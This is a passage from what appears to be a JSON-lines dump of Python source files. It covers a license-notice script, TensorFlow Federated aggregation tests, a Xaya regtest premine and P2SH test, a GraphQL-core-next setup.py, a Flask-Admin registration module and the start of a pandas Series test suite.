print(\"License notice is missing in some source files! 💔\")\n for pyfile in missing_notice_files:\n print(f\" {pyfile}\")\n sys.exit(1)\n else:\n print(\"All source files have the license notice! 🎉\")\n sys.exit(0)\n else:\n print(\"Successfully added license notice to:\")\n for pyfile in missing_notice_files:\n code = pyfile.read_text()\n pyfile.write_text(\"\\n\".join([NOTICE, code]))\n print(f\" {pyfile}\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2fc40ddc164c90b62b6dc082080f9f5f1fd070", "content": "# Copyright 2019, The TensorFlow Federated Authors. #\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport collections\n\nimport tensorflow as tf\nimport tensorflow_federated as tff\n\nfrom tensorflow_federated.python.research.utils import aggregate_fns\n\n\ndef create_weights_delta(input_size=2, hidden_size=5, constant=0):\n \"\"\"Returns deterministic weights delta for a linear model.\"\"\"\n kernel = constant + tf.reshape(\n tf.range(input_size * hidden_size, dtype=tf.float32),\n [input_size, hidden_size])\n bias = constant + tf.range(hidden_size, dtype=tf.float32)\n return collections.OrderedDict([('dense/kernel', kernel),\n ('dense/bias', bias)])\n\n\nclass ClipNormAggregateFnTest(tf.test.TestCase):\n\n def global_norm(self, value):\n return tf.linalg.global_norm(tf.nest.flatten(value))\n\n def test_clip_by_global_norm(self):\n clip_norm = 20.0\n aggregate_fn = aggregate_fns.build_clip_norm_aggregate_fn(clip_norm)\n # Global l2 norms [17.74824, 53.99074].\n deltas = [create_weights_delta(), create_weights_delta(constant=10)]\n deltas_type = tff.framework.type_from_tensors(deltas[0])\n weights = [1., 1.]\n\n @tff.federated_computation(\n tff.FederatedType(deltas_type, tff.CLIENTS),\n tff.FederatedType(tf.float32, tff.CLIENTS))\n def federated_aggregate_test(deltas, weights):\n state = tff.federated_value(aggregate_fn.initialize(), tff.SERVER)\n return aggregate_fn(state, deltas, weights)\n\n federated_aggregate_test.type_signature.result.check_equivalent_to(\n tff.StructType((\n tff.FederatedType(\n aggregate_fns.ClipNormAggregateState(\n clip_norm=tf.float32, max_norm=tf.float32), tff.SERVER),\n tff.FederatedType(deltas_type, tff.SERVER),\n )))\n\n state, mean = federated_aggregate_test(deltas, weights)\n\n expected_clipped = []\n for delta in deltas:\n flat = tf.nest.flatten(delta)\n clipped, _ = tf.clip_by_global_norm(flat, clip_norm)\n expected_clipped.append(tf.nest.pack_sequence_as(delta, clipped))\n expected_mean = tf.nest.map_structure(lambda a, b: (a + b) / 2,\n *expected_clipped)\n self.assertEqual(state.clip_norm, tf.constant(20.0, tf.float32))\n self.assertEqual(state.max_norm, tf.constant(53.99074, tf.float32))\n tf.nest.map_structure(self.assertAllEqual, expected_mean, mean)\n\n\nclass FixedClipNormProcessTest(tf.test.TestCase):\n\n def test_clip_by_global_norm(self):\n clip_norm = 20.0\n test_deltas = [create_weights_delta(), create_weights_delta(constant=10)]\n update_type = tff.framework.type_from_tensors(test_deltas[0])\n aggregate_fn = aggregate_fns.build_fixed_clip_norm_mean_process(\n clip_norm=clip_norm, model_update_type=update_type)\n\n self.assertEqual(\n aggregate_fn.next.type_signature,\n tff.FunctionType(\n parameter=(\n tff.FederatedType((), tff.SERVER),\n tff.FederatedType(update_type, tff.CLIENTS),\n tff.FederatedType(tf.float32, tff.CLIENTS),\n ),\n result=collections.OrderedDict(\n state=tff.FederatedType((), tff.SERVER),\n result=tff.FederatedType(update_type, tff.SERVER),\n measurements=tff.FederatedType(\n aggregate_fns.NormClippedAggregationMetrics(\n max_global_norm=tf.float32, num_clipped=tf.int32),\n tff.SERVER)),\n ))\n\n state = aggregate_fn.initialize()\n weights = [1., 1.]\n output = aggregate_fn.next(state, test_deltas, weights)\n\n expected_clipped = []\n for delta in test_deltas:\n clipped, _ = tf.clip_by_global_norm(tf.nest.flatten(delta), clip_norm)\n expected_clipped.append(tf.nest.pack_sequence_as(delta, clipped))\n expected_mean = tf.nest.map_structure(lambda a, b: (a + b) / 2,\n *expected_clipped)\n self.assertAllClose(expected_mean, output['result'])\n\n # Global l2 norms [17.74824, 53.99074].\n metrics = output['measurements']\n self.assertAlmostEqual(metrics.max_global_norm, 53.99074, places=5)\n self.assertEqual(metrics.num_clipped, 1)\n\n\nif __name__ == '__main__':\n tf.test.main()\n"} {"ext": "py", "sha": "1a2fc42564e0d25ea3508aa3521acc4641688c8b", "content": "#!/usr/bin/env python3\n# Copyright (c) 2018-2021 The Xaya developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n\"\"\"Test spendability of premine and that P2SH is enforced correctly for it.\"\"\"\n\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.messages import *\nfrom test_framework.util import *\n\nimport codecs\n\nPREMINE_VALUE = Decimal ('222222222')\nPREMINE_ADDRESS = 'dHNvNaqcD7XPDnoRjAoyfcMpHRi5upJD7p'\nPREMINE_PRIVKEYS = ['b69iyynFSWcU54LqXisbbqZ8uTJ7Dawk3V3yhht6ykxgttqMQFjb',\n 'b3fgAKVQpMj24gbuh6DiXVwCCjCbo1cWiZC2fXgWEU9nXy6sdxD5']\nPREMINE_PUBKEYS = [\n '03c278d06b977e67b8ea45ef24e3c96a9258c47bc4cce3d0b497b690d672497b6e',\n '0221ac9dc97fe12a98374344d08b458a9c2c1df9afb29dd6089b94a3b4dc9ad570',\n]\n\nclass PremineTest(BitcoinTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 1\n\n def skip_test_if_missing_module (self):\n self.skip_if_no_wallet ()\n\n def run_test(self):\n node = self.nodes[0]\n node.importaddress (PREMINE_ADDRESS)\n\n # Find basic data about the genesis coinbase tx.\n genesis = node.getblock (node.getblockhash (0), 2)\n assert_equal (len (genesis['tx']), 1)\n tx = genesis['tx'][0]\n txid = tx['hash']\n assert_equal (len (tx['vout']), 1)\n out = tx['vout'][0]\n assert_equal (out['value'], PREMINE_VALUE)\n assert_equal (out['scriptPubKey']['address'], PREMINE_ADDRESS)\n\n # Accessing it should work normally (upstream Bitcoin/Namecoin have a\n # special check that disallows the genesis coinbase with getrawtransaction,\n # as it is not spendable).\n node.gettransaction (txid)\n assert_equal (node.getrawtransaction (txid, False, genesis['hash']),\n tx['hex'])\n\n # The coinbase txout should be in the UTXO set.\n utxo = node.gettxout (txid, 0)\n assert utxo is not None\n\n # Check balance of node and then import the keys for the premine\n # and check again. It should be available as spendable.\n assert_equal (node.getbalance (), 0)\n for key in PREMINE_PRIVKEYS:\n node.importprivkey (key, 'premine') \n pubkeys = []\n for addr in node.getaddressesbylabel ('premine'):\n data = node.getaddressinfo (addr)\n if (not data['isscript']) and (not data['iswitness']):\n pubkeys.append (data['pubkey'])\n assert_equal (set (pubkeys), set (PREMINE_PUBKEYS))\n p2sh = node.addmultisigaddress (1, PREMINE_PUBKEYS)\n assert_equal (p2sh['address'], PREMINE_ADDRESS)\n node.rescanblockchain ()\n assert_equal (node.getbalance (), PREMINE_VALUE)\n\n # Construct a raw tx spending the premine.\n addr = node.getnewaddress ()\n inputs = [{\"txid\": txid, \"vout\": 0}]\n outputs = {addr: Decimal ('123456')}\n rawTx = node.createrawtransaction (inputs, outputs)\n\n # Try to \"sign\" it by just adding the redeem script, which would have been\n # valid before the P2SH softfork. Doing so should fail, which verifies that\n # P2SH is enforced right from the start and thus that the premine is safe.\n data = node.getaddressinfo (PREMINE_ADDRESS)\n redeemScript = data['hex']\n # Prepend script size, so that it will correctly push the script hash\n # to the stack.\n redeemScript = (\"%02x\" % (len (redeemScript) // 2)) + redeemScript\n forgedTx = tx_from_hex (rawTx)\n forgedTx.vin[0].scriptSig = codecs.decode (redeemScript, 'hex_codec')\n forgedTx = forgedTx.serialize ().hex ()\n assert_raises_rpc_error (-26, \"not valid\",\n node.sendrawtransaction, forgedTx, 0)\n\n # Sign and send the raw tx, should succeed.\n signed = node.signrawtransactionwithwallet (rawTx)\n assert signed['complete']\n signedTx = signed['hex']\n sendId = node.sendrawtransaction (signedTx, 0)\n node.generate (1)\n assert_equal (node.gettransaction (sendId)['confirmations'], 1)\n\nif __name__ == '__main__':\n PremineTest().main()\n"} {"ext": "py", "sha": "1a2fc4c1e27cfa944455dd9e15fa7f96ace3d7d8", "content": "from re import search\nfrom setuptools import setup, find_packages\n\nwith open(\"graphql/__init__.py\") as init_file:\n version = search('__version__ = \"(.*)\"', init_file.read()).group(1)\n\nwith open(\"README.md\") as readme_file:\n readme = readme_file.read()\n\nsetup(\n name=\"GraphQL-core-next\",\n version=version,\n description=\"GraphQL-core-next is a Python port of GraphQL.js,\"\n \" the JavaScript reference implementation for GraphQL.\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n keywords=\"graphql\",\n url=\"https://github.com/graphql-python/graphql-core-next\",\n author=\"Christoph Zwerschke\",\n author_email=\"cito@online.de\",\n license=\"MIT license\",\n # PEP-561: https://www.python.org/dev/peps/pep-0561/\n package_data={\"graphql\": [\"py.typed\"]},\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n install_requires=[],\n python_requires=\">=3.6\",\n test_suite=\"tests\",\n tests_require=[\n \"pytest\",\n \"pytest-asyncio\",\n \"pytest-cov\",\n \"pytest-describe\",\n \"black\",\n \"flake8\",\n \"mypy\",\n \"tox\",\n \"python-coveralls\",\n ],\n packages=find_packages(include=[\"graphql\"]),\n include_package_data=True,\n zip_safe=False,\n)\n"} {"ext": "py", "sha": "1a2fc4e313fbc3ebe872bc603357771bf264967c", "content": "'''\nFlask-Admin has issues when used with Application Factory pattern.\nSince I had issues when using it with pytest, I had to move the admin\ninstance to \"register_admin\" method.\n\nhttps://github.com/flask-admin/flask-admin/issues/910\n'''\nfrom flask import redirect, url_for, request\nfrom flask_admin import Admin\nfrom flask_admin.menu import MenuLink\nfrom flask_admin.contrib.sqla import ModelView\nfrom flask_login import current_user\n\nfrom app.extensions import db\nfrom app.auth.models import User, Role, PreAllowedUser\nfrom app.main.models import (\n Product, Specification, StockProduct, Stock, Order, OrderItem, Transaction)\n\n\nclass ProtectedModelView(ModelView):\n column_display_pk = True\n def is_accessible(self):\n return (current_user.is_authenticated and\n current_user.is_administrator())\n\n def inaccessible_callback(self, name, **kwargs):\n return redirect(url_for('auth.login', next=request.url))\n\n\ndef register_admin(app):\n admin = Admin(app=app, template_mode='bootstrap3')\n admin.add_link(MenuLink(name='Voltar', url=('/')))\n admin.add_views(\n ProtectedModelView(User, db.session),\n ProtectedModelView(Role, db.session),\n ProtectedModelView(PreAllowedUser, db.session),\n ProtectedModelView(Product, db.session),\n ProtectedModelView(Specification, db.session),\n ProtectedModelView(StockProduct, db.session),\n ProtectedModelView(Stock, db.session),\n ProtectedModelView(Order, db.session),\n ProtectedModelView(OrderItem, db.session),\n ProtectedModelView(Transaction, db.session),\n )\n"} {"ext": "py", "sha": "1a2fc5a8fc13c30248bcafa6f23e14668fd26734", "content": "# coding=utf-8\n# pylint: disable-msg=E1101,W0612\n\nimport sys\nfrom datetime import datetime, timedelta\nimport operator\nimport string\nfrom inspect import getargspec\nfrom itertools import product, starmap\nfrom distutils.version import LooseVersion\n\nimport nose\n\nfrom numpy import nan, inf\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\n\nfrom pandas import (Index, Series, DataFrame, isnull, notnull, bdate_range,\n date_range, period_range, timedelta_range)\nfrom pandas.core.index import MultiIndex\nfrom pandas.core.indexing import IndexingError\nfrom pandas.tseries.period import PeriodIndex\nfrom pandas.tseries.index import Timestamp, DatetimeIndex\nfrom pandas.tseries.tdi import Timedelta, TimedeltaIndex\nimport pandas.core.common as com\nimport pandas.core.config as cf\nimport pandas.lib as lib\n\nimport pandas.core.datetools as datetools\nimport pandas.core.nanops as nanops\n\nfrom pandas.compat import StringIO, lrange, range, zip, u, OrderedDict, long\nfrom pandas import compat\nfrom pandas.util.testing import (assert_series_equal,\n assert_almost_equal,\n assert_frame_equal,\n ensure_clean)\nimport pandas.util.testing as tm\n\n\n#------------------------------------------------------------------------------\n# Series test cases\n\nJOIN_TYPES = ['inner', 'outer', 'left', 'right']\n\n\nclass CheckNameIntegration(object):\n\n _multiprocess_can_split_ = True\n\n def test_scalarop_preserve_name(self):\n result = self.ts * 2\n self.assertEqual(result.name, self.ts.name)\n\n def test_copy_name(self):\n result = self.ts.copy()\n self.assertEqual(result.name, self.ts.name)\n\n def test_copy_index_name_checking(self):\n # don't want to be able to modify the index stored elsewhere after\n # making a copy\n\n self.ts.index.name = None\n self.assertIsNone(self.ts.index.name)\n self.assertIs(self.ts, self.ts)\n\n cp = self.ts.copy()\n cp.index.name = 'foo'\n com.pprint_thing(self.ts.index.name)\n self.assertIsNone(self.ts.index.name)\n\n def test_append_preserve_name(self):\n result = self.ts[:5].append(self.ts[5:])\n self.assertEqual(result.name, self.ts.name)\n\n def test_dt_namespace_accessor(self):\n\n # GH 7207\n # test .dt namespace accessor\n\n ok_for_base = ['year','month','day','hour','minute','second','weekofyear','week','dayofweek','weekday','dayofyear','quarter','freq']\n ok_for_period = ok_for_base + ['qyear']\n ok_for_dt = ok_for_base + ['date','time','microsecond','nanosecond', 'is_month_start', 'is_month_end', 'is_quarter_start',\n 'is_quarter_end', 'is_year_start', 'is_year_end', 'tz']\n ok_for_dt_methods = ['to_period','to_pydatetime','tz_localize','tz_convert']\n ok_for_td = ['days','seconds','microseconds','nanoseconds']\n ok_for_td_methods = ['components','to_pytimedelta']\n\n def get_expected(s, name):\n result = getattr(Index(s.values),prop)\n if isinstance(result, np.ndarray):\n if com.is_integer_dtype(result):\n result = result.astype('int64')\n elif not com.is_list_like(result):\n return result\n return Series(result,index=s.index)\n\n def compare(s, name):\n a = getattr(s.dt,prop)\n b = get_expected(s,prop)\n if not (com.is_list_like(a) and com.is_list_like(b)):\n self.assertEqual(a,b)\n else:\n tm.assert_series_equal(a,b)\n\n # invalids\n for s in [Series(np.arange(5)),\n Series(list('abcde')),\n Series(np.random.randn(5))]:\n self.assertRaises(TypeError, lambda : s.dt)\n\n # datetimeindex\n for s in [Series(date_range('20130101',periods=5)),\n Series(date_range('20130101',periods=5,freq='s')),\n Series(date_range('20130101 00:00:00',periods=5,freq='ms'))]:\n for prop in ok_for_dt:\n\n # we test freq below\n if prop != 'freq':\n compare(s, prop)\n\n for prop in ok_for_dt_methods:\n getattr(s.dt,prop)\n\n result = s.dt.to_pydatetime()\n self.assertIsInstance(result,np.ndarray)\n self.assertTrue(result.dtype == object)\n\n result = s.dt.tz_localize('US/Eastern')\n expected = Series(DatetimeIndex(s.values).tz_localize('US/Eastern'),index=s.index)\n tm.assert_series_equal(result, expected)\n\n tz_result = result.dt.tz\n self.assertEqual(str(tz_result), 'US/Eastern')\n freq_result = s.dt.freq\n self.assertEqual(freq_result, DatetimeIndex(s.values, freq='infer').freq)\n\n # let's localize, then convert\n result = s.dt.tz_localize('UTC').dt.tz_convert('US/Eastern')\n expected = Series(DatetimeIndex(s.values).tz_localize('UTC').tz_convert('US/Eastern'),index=s.index)\n tm.assert_series_equal(result, expected)\n\n # timedeltaindex\n for s in [Series(timedelta_range('1 day',periods=5),index=list('abcde')),\n Series(timedelta_range('1 day 01:23:45',periods=5,freq='s')),\n Series(timedelta_range('2 days 01:23:45.012345',periods=5,freq='ms'))]:\n for prop in ok_for_td:\n\n # we test freq below\n if prop != 'freq':\n compare(s, prop)\n\n for prop in ok_for_td_methods:\n getattr(s.dt,prop)\n\n result = s.dt.components\n self.assertIsInstance(result,DataFrame)\n tm.assert_index_equal(result.index,s.index)\n\n result = s.dt.to_pytimedelta()\n self.assertIsInstance(result,np.ndarray)\n self.assertTrue(result.dtype == object)\n\n freq_result = s.dt.freq\n self.assertEqual(freq_result, TimedeltaIndex(s.values, freq='infer').freq)\n\n # both\n index = date_range('20130101',periods=3,freq='D')\n s = Series(date_range('20140204',periods=3,freq='s'),index=index)\n tm.assert_series_equal(s.dt.year,Series(np.array([2014,2014,2014],dtype='int64'),index=index))\n tm.assert_series_equal(s.dt.month,Series(np.array([2,2,2],dtype='int64'),index=index))\n tm.assert_series_equal(s.dt.second,Series(np.array([0,1,2],dtype='int64'),index=index))\n\n # periodindex\n for s in [Series(period_range('20130101',periods=5,freq='D'))]:\n\n for prop in ok_for_period:\n\n # we test freq below\n if prop != 'freq':\n compare(s, prop)\n\n freq_result = s.dt.freq\n self.assertEqual(freq_result, PeriodIndex(s.values).freq)\n\n # test limited display api\n def get_dir(s):\n results = [ r for r in s.dt.__dir__() if not r.startswith('_') ]\n return list(sorted(set(results)))\n\n s = Series(date_range('20130101',periods=5,freq='D'))\n results = get_dir(s)\n tm.assert_almost_equal(results,list(sorted(set(ok_for_dt + ok_for_dt_methods))))\n\n s = Series(period_range('20130101',periods=5,freq='D').asobject)\n results = get_dir(s)\n tm.assert_almost_equal(results,list(sorted(set(ok_for_period))))\n\n # no setting allowed\n s = Series(date_range('20130101',periods=5,freq='D'))\n with tm.assertRaisesRegexp(ValueError, \"modifications\"):\n s.dt.hour = 5\n\n # trying to set a copy\n with pd.option_context('chained_assignment','raise'):\n def f():\n s.dt.hour[0] = 5\n self.assertRaises(com.SettingWithCopyError, f)\n\n def test_valid_dt_with_missing_values(self):\n\n from datetime import date, time\n\n # GH 8689\n s = Series(date_range('20130101',periods=5,freq='D'))\n s_orig = s.copy()\n s.iloc[2] = pd.NaT\n\n for attr in ['microsecond','nanosecond','second','minute','hour','day']:\n expected = getattr(s.dt,attr).copy()\n expected.iloc[2] = np.nan\n result = getattr(s.dt,attr)\n tm.assert_series_equal(result, expected)\n\n result = s.dt.date\n expected = Series([date(2013,1,1),date(2013,1,2),np.nan,date(2013,1,4),date(2013,1,5)],dtype='object')\n tm.assert_series_equal(result, expected)\n\n result = s.dt.time\n expected = Series([time(0),time(0),np.nan,time(0),time(0)],dtype='object')\n tm.assert_series_equal(result, expected)\n\n def test_dt_accessor_api(self):\n # GH 9322\n from pandas.tseries.common import (CombinedDatetimelikeProperties,\n DatetimeProperties)\n self.assertIs(Series.dt, CombinedDatetimelikeProperties)\n\n s = Series(date_range('2000-01-01', periods=3))\n self.assertIsInstance(s.dt, DatetimeProperties)\n\n with tm.assertRaisesRegexp(TypeError, \"only use .dt accessor\"):\n Series([1]).dt\n\n def test_binop_maybe_preserve_name(self):\n\n # names match, preserve\n result = self.ts * self.ts\n self.assertEqual(result.name, self.ts.name)\n\n result = self.ts * self.ts[:-2]\n self.assertEqual(result.name, self.ts.name)\n\n # names don't match, don't preserve\n cp = self.ts.copy()\n cp.name = 'something else'\n result = self.ts + cp\n self.assertIsNone(result.name)\n\n def test_combine_first_name(self):\n result = self.ts.combine_first(self.ts[:5])\n self.assertEqual(result.name, self.ts.name)\n\n def test_combine_first_dt64(self):\n from pandas.tseries.tools import to_datetime\n s0 = to_datetime(Series([\"2010\", np.NaN]))\n s1 = to_datetime(Series([np.NaN, \"2011\"]))\n rs = s0.combine_first(s1)\n xp = to_datetime(Series(['2010', '2011']))\n assert_series_equal(rs, xp)\n\n s0 = to_datetime(Series([\"2010\", np.NaN]))\n s1 = Series([np.NaN, \"2011\"])\n rs = s0.combine_first(s1)\n xp = Series([datetime(2010, 1, 1), '2011'])\n assert_series_equal(rs, xp)\n\n def test_get(self):\n\n # GH 6383\n s = Series(np.array([43, 48, 60, 48, 50, 51, 50, 45, 57, 48, 56,\n 45, 51, 39, 55, 43, 54, 52, 51, 54]))\n\n result = s.get(25, 0)\n expected = 0\n self.assertEqual(result,expected)\n\n s = Series(np.array([43, 48, 60, 48, 50, 51, 50, 45, 57, 48, 56,\n 45, 51, 39, 55, 43, 54, 52, 51, 54]),\n index=pd.Float64Index([25.0, 36.0, 49.0, 64.0, 81.0, 100.0,\n 121.0, 144.0, 169.0, 196.0, 1225.0,\n 1296.0, 1369.0, 1444.0, 1521.0, 1600.0,\n 1681.0, 1764.0, 1849.0, 1936.0],\n dtype='object'))\n\n result = s.get(25, 0)\n expected = 43\n self.assertEqual(result,expected)\n\n # GH 7407\n # with a boolean accessor\n df = pd.DataFrame({'i':[0]*3, 'b':[False]*3})\n vc = df.i.value_counts()\n result = vc.get(99,default='Missing')\n self.assertEqual(result,'Missing')\n\n vc = df.b.value_counts()\n result = vc.get(False,default='Missing')\n self.assertEqual(result,3)\n\n result = vc.get(True,default='Missing')\n self.assertEqual(result,'Missing')\n\n def test_delitem(self):\n\n # GH 5542\n # should delete the item inplace\n s = Series(lrange(5))\n del s[0]\n\n expected = Series(lrange(1,5),index=lrange(1,5))\n assert_series_equal(s, expected)\n\n del s[1]\n expected = Series(lrange(2,5),index=lrange(2,5))\n assert_series_equal(s, expected)\n\n # empty\n s = Series()\n def f():\n del s[0]\n self.assertRaises(KeyError, f)\n\n # only 1 left, del, add, del\n s = Series(1)\n del s[0]\n assert_series_equal(s, Series(dtype='int64'))\n s[0] = 1\n assert_series_equal(s, Series(1))\n del s[0]\n assert_series_equal(s, Series(dtype='int64'))\n\n def test_getitem_preserve_name(self):\n result = self.ts[self.ts > 0]\n self.assertEqual(result.name, self.ts.name)\n\n result = self.ts[[0, 2, 4]]\n self.assertEqual(result.name, self.ts.name)\n\n result = self.ts[5:10]\n self.assertEqual(result.name, self.ts.name)\n\n def test_getitem_setitem_ellipsis(self):\n s = Series(np.random.randn(10))\n\n np.fix(s)\n\n result = s[...]\n assert_series_equal(result, s)\n\n s[...] = 5\n self.assertTrue((result == 5).all())\n\n def test_getitem_negative_out_of_bounds(self):\n s = Series(tm.rands_array(5, 10), index=tm.rands_array(10, 10))\n\n self.assertRaises(IndexError, s.__getitem__, -11)\n self.assertRaises(IndexError, s.__setitem__, -11, 'foo')\n\n def test_multilevel_name_print(self):\n index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],\n ['one', 'two', 'three']],\n labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],\n [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],\n names=['first', 'second'])\n s = Series(lrange(0, len(index)), index=index, name='sth')\n expected = [\"first second\",\n \"foo one 0\",\n \" two 1\",\n \" three 2\",\n \"bar one 3\",\n \" two 4\",\n \"baz two 5\",\n \" three 6\",\n \"qux one 7\",\n \" two 8\",\n \" three 9\",\n \"Name: sth, dtype: int64\"]\n expected = \"\\n\".join(expected)\n self.assertEqual(repr(s), expected)\n\n def test_multilevel_preserve_name(self):\n index = MultiIndex(levels=[['foo', 'bar', 'baz', 'qux'],\n ['one', 'two', 'three']],\n labels=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3],\n [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],\n names=['first', 'second'])\n s = Series(np.random.randn(len(index)), index=index, name='sth')\n\n result = s['foo']\n result2 = s.ix['foo']\n self.assertEqual(result.name, s.name)\n self.assertEqual(result2.name, s.name)\n\n def test_name_printing(self):\n # test small series\n s = Series([0, 1, 2])\n s.name = \"test\"\n self.assertIn(\"Name: test\", repr(s))\n s.name = None\n self.assertNotIn(\"Name:\", repr(s))\n # test big series (diff code path)\n s = Series(lrange(0, 1000))\n s.name = \"test\"\n self.assertIn(\"Name: test\", repr(s))\n s.name = None\n self.assertNotIn(\"Name:\", repr(s))\n\n s = Series(index=date_range('20010101', '20020101'), name='test')\n self.assertIn(\"Name: test\", repr(s))\n\n def test_pickle_preserve_name(self):\n unpickled = self._pickle_roundtrip_name(self.ts)\n self.assertEqual(unpickled.name, self.ts.name)\n\n def _pickle_roundtrip_name(self, obj):\n\n with ensure_clean() as path:\n obj.to_pickle(path)\n unpickled = pd.read_pickle(path)\n return unpickled\n\n def test_argsort_preserve_name(self):\n result = self.ts.argsort()\n self.assertEqual(result.name, self.ts.name)\n\n def test_sort_index_name(self):\n result = self.ts.sort_index(ascending=False)\n self.assertEqual(result.name, self.ts.name)\n\n def test_to_sparse_pass_name(self):\n result = self.ts.to_sparse()\n self.assertEqual(result.name, self.ts.name)\n\n\nclass TestNanops(tm.TestCase):\n\n _multiprocess_can_split_ = True\n\n def test_comparisons(self):\n left = np.random.randn(10)\n right = np.random.randn(10)\n left[:3] = np.nan\n\n result = nanops.nangt(left, right)\n expected = (left > right).astype('O')\n expected[:3] = np.nan\n\n assert_almost_equal(result, expected)\n\n s = Series(['a', 'b', 'c'])\n s2 = Series([False, True, False])\n\n # it works!\n s == s2\n s2 == s\n\n def test_none_comparison(self):\n # bug brought up by #1079\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n self.assertRaises(TypeError, s.__eq__, None)\n\n def test_sum_zero(self):\n arr = np.array([])\n self.assertEqual(nanops.nansum(arr), 0)\n\n arr = np.empty((10, 0))\n self.assertTrue((nanops.nansum(arr, axis=1) == 0).all())\n\n # GH #844\n s = Series([], index=[])\n self.assertEqual(s.sum(), 0)\n\n df = DataFrame(np.empty((10, 0)))\n self.assertTrue((df.sum(1) == 0).all())\n\n def test_nansum_buglet(self):\n s = Series([1.0, np.nan], index=[0, 1])\n result = np.nansum(s)\n assert_almost_equal(result, 1)\n\n def test_overflow(self):\n\n # GH 6915\n # overflowing on the smaller int dtypes\n for dtype in ['int32','int64']:\n v = np.arange(5000000,dtype=dtype)\n s = Series(v)\n\n # no bottleneck\n result = s.sum(skipna=False)\n self.assertEqual(int(result),v.sum(dtype='int64'))\n result = s.min(skipna=False)\n self.assertEqual(int(result),0)\n result = s.max(skipna=False)\n self.assertEqual(int(result),v[-1])\n\n # use bottleneck if available\n result = s.sum()\n self.assertEqual(int(result),v.sum(dtype='int64'))\n result = s.min()\n self.assertEqual(int(result),0)\n result = s.max()\n self.assertEqual(int(result),v[-1])\n\n for dtype in ['float32','float64']:\n v = np.arange(5000000,dtype=dtype)\n s = Series(v)\n\n # no bottleneck\n result = s.sum(skipna=False)\n self.assertTrue(np.allclose(float(result),v.sum(dtype='float64')))\n result = s.min(skipna=False)\n self.assertTrue(np.allclose(float(result),0.0))\n result = s.max(skipna=False)\n self.assertTrue(np.allclose(float(result),v[-1]))\n\n # use bottleneck if available\n result = s.sum()\n self.assertTrue(np.allclose(float(result),v.sum(dtype='float64')))\n result = s.min()\n self.assertTrue(np.allclose(float(result),0.0))\n result = s.max()\n self.assertTrue(np.allclose(float(result),v[-1]))\n\nclass SafeForSparse(object):\n pass\n\n_ts = tm.makeTimeSeries()\n\nclass TestSeries(tm.TestCase, CheckNameIntegration):\n\n _multiprocess_can_split_ = True\n\n def setUp(self):\n import warnings\n warnings.filterwarnings(action='ignore', category=FutureWarning)\n\n self.ts = _ts.copy()\n self.ts.name = 'ts'\n\n self.series = tm.makeStringSeries()\n self.series.name = 'series'\n\n self.objSeries = tm.makeObjectSeries()\n self.objSeries.name = 'objects'\n\n self.empty = Series([], index=[])\n\n def test_scalar_conversion(self):\n\n # Pass in scalar is disabled\n scalar = Series(0.5)\n self.assertNotIsInstance(scalar, float)\n\n # coercion\n self.assertEqual(float(Series([1.])), 1.0)\n self.assertEqual(int(Series([1.])), 1)\n self.assertEqual(long(Series([1.])), 1)\n\n def test_astype(self):\n s = Series(np.random.randn(5),name='foo')\n\n for dtype in ['float32','float64','int64','int32']:\n astyped = s.astype(dtype)\n self.assertEqual(astyped.dtype, dtype)\n self.assertEqual(astyped.name, s.name)\n\n def test_constructor(self):\n # Recognize TimeSeries\n self.assertTrue(self.ts.is_time_series)\n\n # Pass in Series\n derived = Series(self.ts)\n self.assertTrue(derived.is_time_series)\n\n self.assertTrue(tm.equalContents(derived.index, self.ts.index))\n # Ensure new index is not created\n self.assertEqual(id(self.ts.index), id(derived.index))\n\n # Mixed type Series\n mixed = Series(['hello', np.NaN], index=[0, 1])\n self.assertEqual(mixed.dtype, np.object_)\n self.assertIs(mixed[1], np.NaN)\n\n self.assertFalse(self.empty.is_time_series)\n self.assertFalse(Series({}).is_time_series)\n\n self.assertRaises(Exception, Series, np.random.randn(3, 3),\n index=np.arange(3))\n\n mixed.name = 'Series'\n rs = Series(mixed).name\n xp = 'Series'\n self.assertEqual(rs, xp)\n\n # raise on MultiIndex GH4187\n m = MultiIndex.from_arrays([[1, 2], [3, 4]])\n self.assertRaises(NotImplementedError, Series, m)\n\n def test_constructor_empty(self):\n empty = Series()\n empty2 = Series([])\n assert_series_equal(empty, empty2)\n\n empty = Series(index=lrange(10))\n empty2 = Series(np.nan, index=lrange(10))\n assert_series_equal(empty, empty2)\n\n def test_constructor_series(self):\n index1 = ['d', 'b', 'a', 'c']\n index2 = sorted(index1)\n s1 = Series([4, 7, -5, 3], index=index1)\n s2 = Series(s1, index=index2)\n\n assert_series_equal(s2, s1.sort_index())\n\n def test_constructor_iterator(self):\n\n expected = Series(list(range(10)),dtype='int64')\n result = Series(range(10),dtype='int64')\n assert_series_equal(result, expected)\n\n def test_constructor_generator(self):\n gen = (i for i in range(10))\n\n result = Series(gen)\n exp = Series(lrange(10))\n assert_series_equal(result, exp)\n\n gen = (i for i in range(10))\n result = Series(gen, index=lrange(10, 20))\n exp.index = lrange(10, 20)\n assert_series_equal(result, exp)\n\n def test_constructor_map(self):\n # GH8909\n m = map(lambda x: x, range(10))\n\n result = Series(m)\n exp = Series(lrange(10))\n assert_series_equal(result, exp)\n\n m = map(lambda x: x, range(10))\n result = Series(m, index=lrange(10, 20))\n 